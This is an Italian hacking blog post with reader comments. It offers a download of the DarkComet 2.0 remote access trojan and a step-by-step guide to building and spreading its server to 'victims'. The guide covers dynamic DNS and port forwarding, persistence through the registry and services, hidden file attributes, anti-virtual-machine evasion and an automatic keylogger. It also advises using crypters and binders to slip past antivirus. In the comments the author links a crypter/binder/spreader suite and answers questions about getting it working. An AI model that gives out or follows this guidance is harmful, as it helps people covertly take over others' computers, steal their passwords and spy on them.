mercoledì 31 marzo 2010

DarkComet 2.0 RC4 - RAT


DarkComet-RAT (Remote Administration Tool) è un potente e stabile RAT(Remote administration Tool) che ti permette di controllare computer remoti in modo semplice e veloce , puoi vedere il desktop, la webcam, controllare i processi remoti, ascoltare i suoni etc... allo stesso tempo e con una velocità elevata , DarkComet può lavorare in LAN ( Local Area Network ) e WAN ( Wide Area Network ) .
DarkComet è compatibile con Windows 2000 , Windows XP (all sp), Windows Vista (all sp) and Windows Seven, sia 32(.386) che 64 bit .

[DOWNLOAD]
LINK VERIFICATO: (Consigliato) [Cos'è?]
Password: hackeritalia.blogspot.com
http://sharecash.org/download.php?file=562957

LINK NON VERIFICATO: (NON SICURO)
n.d.

[/DOWNLOAD]

Caratteristiche: (Features)
-SYSTEM INFO (informazioni sul pc-vittima)
-FUN FUNCTIONS (funzioni divertenti)
-SYSTEM FUNCTIONS:
-Process Manager; (modifica i processi remoti)
-Remote Registry; (cambia i valori del registro di windows)
-Remote Shell; (invia comandi al pc)-Window Functions (controlla le finestre attive)
-Unistall Applications (Disinstalla i software del pc remoto)
-Remote MSConfig (Cambia le impostazioni di avvio)
-Remote Scripting (Esegui script in vari linguaggi nel pc remoto)
-Files Functions (File Manager[Upload/Download] e Search Manager)
-Password (Visualizza le password di MSN,Firefox,IE7 ed i log di utorrent)
-Msn Functions (Controlla MSN e visualizza i contatti)
-Spy Functions (Controlla Webcam e Suoni, Controlla il Desktop, Keylogger ONline/OFFline)
-Network Functions (Url Download, visualizzazione remota delle pagine web, redirect)
-Misc Functions (Controlla stampante, messaggi)-Quick Actions (varie funzioni di controllo remoto)
-Log(log della sessione)
-Other
GUIDA: (i link contengono un breve pagina pubblicitaria)
Requisiti:
1. Un account no-ip e scarica NO-IP DUC... Se non ne hai uno crealo segui questa guida: Crea account No-ip

2. Scarica Simple Port Forwarding ed apri la porta 1604 sul tuo router.(se non dovesse funzionare prova a cambiarla manualmente dalla pagina 192.168.1.1[la pagina potrebbe essere diversa]).
-----------------------------------------------------------------------------------------------
[in alcuni casi potrebbe essere necessario disattivare temporaneamente l'antivirus per poter utilizzare il programma]

1.) Scarica Darkcomet 2.0 dal link presente nel post
2.)Scompatta l'archivio e apri il programma . Si dovrebbe aprire un disclaimer:
- spunta la casella "Do not show again" e clicca "I Agree"
3)Ora dobbiamo configurare il RAT in modo che ascolti una determinata porta:
-Clicca "Connection">"Add Socket" ; dovrebbe aprirsi una finestra simile a questa:


4) Lascia le impostazioni come sono e clicca "Listen"
5)Adesso dobbiamo creare il server:
1- Clicca "Edit Server" e dovrebbe apparire una finestra con varie impostazioni:
2-"Edit Server Session": lascia così che serve solo se hai già creato almeno una configurazione...
3-"Main Setting"....
- "Mutex Name": " Clicca Random"
- "Server ID": Scegli un nome da dare alle tue vittime ;-)
- "Protect server connection by password": se vuoi impostare una password per accedere ai pc remoti > non impostarla almeno che tu non abbia un account condiviso.
-"Random Range Instance": Lascia i valori predefiniti...
-"Edit Server Methode":
-EOF "Stabile ma è difficile trovare un buon crypter per criptarlo"
-RES "Tutti i crypter funzionano utilizzando questo metodo" [CONSIGLIATO]
4) Connection Setting:
- Nel campo "IP Address" metti il tuo no-ip (ex: example.no-ip.org)
- Nel campo "Port" lascia la porta di default
5)Server Startup:
Seleziona tutto ("Melt Server" = facoltativo[cancella il file dopo aver installato il server])...
e cambia i valori in questi campi:
-Installation Path: Scegli dove vuoi installare il server
-Intall in Registry Startup: installa il server nel registro di windows
-Install in Windows Services: installa il server come servizio di sistema
-Install with ActiveX Startup: installa il server come ActiveX (clicca Random)
6)Server Shield:
-File Attribute e Parent Folder Attribute: Hidden, System, Read Only.
-Disable Functions: disabilita detrminate funzioni nel pc remoto ;-)
- Spunta la casella Hide Partialy Process
7) Anti VirtualBox:
Spunta la casella "Active Anti VirtualBox" e "Fake Run"
8)Icon Setting: se vuoi cambiare icona al server
9)Generate Server: Spunta le caselle "Active Offline Keylogger at server startup" e "I Accept the DarkComet-RAT EULA" poi clicca "Create Server".

Ok, finalmente puoi iniziare a diffondere il tuo trojan(RAT)... ;-)
ti consiglio di criptarlo e unirlo ad altri file per renderlo invisibile agli anti-virus:
Per trovare il programma adatto cerca con Google "FUD Binder" e "FUD Crypter"
Puoi controllare quanti antivirus individuano il tuo virus SOLO QUI: Novirusthanks.org
[IMPORTANTE: Prima di cliccare "Submit File" spunta la casella "Do not distribute the sample"]

Divertiti !!! ;-)
Guida Scritta Da iBlack, se vuoi pubblicare questa guida posta un link a questo Blog

31 commenti:

Anonimo ha detto...

ciao, mi puoi consigliare dei link per un buon crypter e un binder? Quelli che trovo su google sono tutti spam alla grande

_M$M_ ha detto...

Iscriviti su hackforums.net, ne potrai trovare moltissimi...
http://www.hackforums.net

Gionnino ha detto...

Ma io faccio tutto pero' non capisco come aprire la porta 1604...
Scusate l'ignoranza..
Grazie in anticipo

Anonimo ha detto...

mi sono gia iscritto ma è un casino, molti hanno gli archivi con password un pò incasinate da trovare, altri si scaricano da siti di sharing pieni di spam link e inutilizzabili, se potessi linkarmene qualcuno tu, di facile reperimento te ne sarei molto grato

Anonimo ha detto...

Volevo chiedere se con chiavetta 3 è possibile aprire porte.. grazie

_M$M_ ha detto...

Link Crypter...
Questo non è solo un crypter (fud), ma una suite completa di binder, crypter e spreader... Ti consiglio di usarla con Cybergate.

http://sharecash.org/download.php?file=590180

[il link è su Sharecash]

_M$M_ ha detto...

Con la chiavetta 3....
purtroppo penso non sia possibile aprire le porte...

_M$M_ ha detto...

Aprire la porta 1604:
se non riesci ad aprirla vai su questo sito e segui le indicazioni per il tuo modem:
www.portforward.com

Anonimo ha detto...

grazie mille fa nulla :P

gionnino ha detto...

grazie dell'aiuto

Anonimo ha detto...

@M$M Come faccio a passare al download da ShareCast? Clocco sui link publicitari ma o mi si blocca o vogliono il mio numero di cellulare per attivare degli abbonamenti (e scusa ma qeusto non lo farò mai)

_M$M_ ha detto...

Usa la "fail proof survey", che ti permette di fare il download compilando un inchiesta (basta che inserisci la tua mail ed il nome... nelgi altri box puoi inserire la parola "no") ;-)

Anonimo ha detto...

non la trovo, in che parte della schermata si trova?

_M$M_ ha detto...

devi iniziare aprendo un altra inchiesta... poi aspetta qualche minuto senza fare niente... ti verra una scritta sopra il frame, cliccala... ora tra le inchieste disponibili ci dovrebbe essere anche la fail survey...

tamburro ha detto...

Ciao, io avrei in problema, praticamente ho aperto la porta in questione facendo anche un test in cui risulta aperta. Praticamente in LAN ilserver funziona, mentre in WAN ( sia con no-ip e con l'ip dinamico) il server non riesce a contattare ilClient.
come posso fare!!!!!!
come router ho un Pirelli

_M$M_ ha detto...

Sinceramente non saprei...
ti consiglio di provare un altro RAT,
prova con cybergate...

tamburro ha detto...

vorrei precisare, che sul router si connettono 2 pc... non vorrei che essendo lo stesso ip, il server non riesca a contattarmi...
avevo provato anche con molti altri trojan come cerberus, e lo stesso cybergate. ora ci riproverò...

_M$M_ ha detto...

ma quando hai aperto le porte del router ai controllato di averle aperte per l'indirizzo locale esatto (es: hai due pc quindi uno avrà probabilmente questo indirizzo locale: 192.168.1.2 mentre l'altro 192.168.1.3)
controlla ad ogni avvio che indirizzo locale hai...

andrea ha detto...

ciao volevo chiederti se mi puoi spiegare bene come si fa a scaricare!perche io faccio i test ma alla fine nn mi apre il link.
poi è meglio qst, sub7 o cybergate?!!?!
grazie mille

andrea ha detto...

ciao mi spieghi bene come si scarica?!perche faccio il test poi pero nn mi apre il link!
poi volevo chiederti se era meglio qst sub7 o cybergate?!!?
grazie mille

Francesco ha detto...

ciao, io faccio tutto ma non funziona il mio dubbio è su questo no-ip, devo mettere proprio il nome che ho creato o l'ip a numero? inoltre ti volevo dire se mi dai il tuo msn almeno ne parl meglio

Anonimo ha detto...

ehi francesco ciao mi potresti aggiungere che mi spieghi come funziona il tutto!?ci scambiamo pareri
costanvito@hotmail.it

_M$M_ ha detto...

non riesci a compilare la pubblicità?
???test???

_M$M_ ha detto...

x francesco...
l'hostname del no-ip che hai creato... (es: example.no-ip.info)

Francesco ha detto...

niente ho provato ma niente, ho provato con il mio ip e funziona su me stesso ho provato a metterlo nel pc di mio padre e niente, può essere perchèsiamo tutti sotto uno stesso modem?

Anonimo ha detto...

Ciao _M$M_, ho provato ad usare darkcomet 2.0 rc5 su virtualbox con os win xp sp3. Ho creato un dns no-ip, ho scaricato e fatto funzionare bene no-ip DUC ecc. Il problema è che quando edito un server "normal" mi funziona però una volta riavviato win xp non si carica più. Se invece edito un server "expert" (chiaramente metto che deve installarsi in windows, che dev'essere nascosto ecc) non funziona proprio. come mai? potresti fare una guida un po più accurata o consigliare un RAT che hai provato e che funziona bene col dns? Ps: ho provato senza successo anche CyberGate, e sub7 2.3.1 (quest'ultimo, quando avvio il pc mi apre il server emi chiede con che programma voglio aprirlo -.- XD). Saluti e complimenti per le guide

D3xt3r

Anonimo ha detto...

scusate l ignoranza ma prima..i trojan funzionavano seza sto benedetto no ip e iscrizione al sito..ora perchè dobbiamo usarlo per usare qualsiasi trojan nn capisco l utilita ...grazie

Anonimo ha detto...

una volta fatto tutto e inviato il file e cliccato sul pc da controllare, come faccio a controllarlo?

Dragonhacker ha detto...
Questo commento è stato eliminato dall'autore.
Dragonhacker ha detto...

scusate ma come si scarica??
mi viene fuori una lista di domande mah

Anonimo ha detto...

MSM io non riesco a completare sharecash, non potresti riupparlo da un'altra parte per piacere? ;) bella guida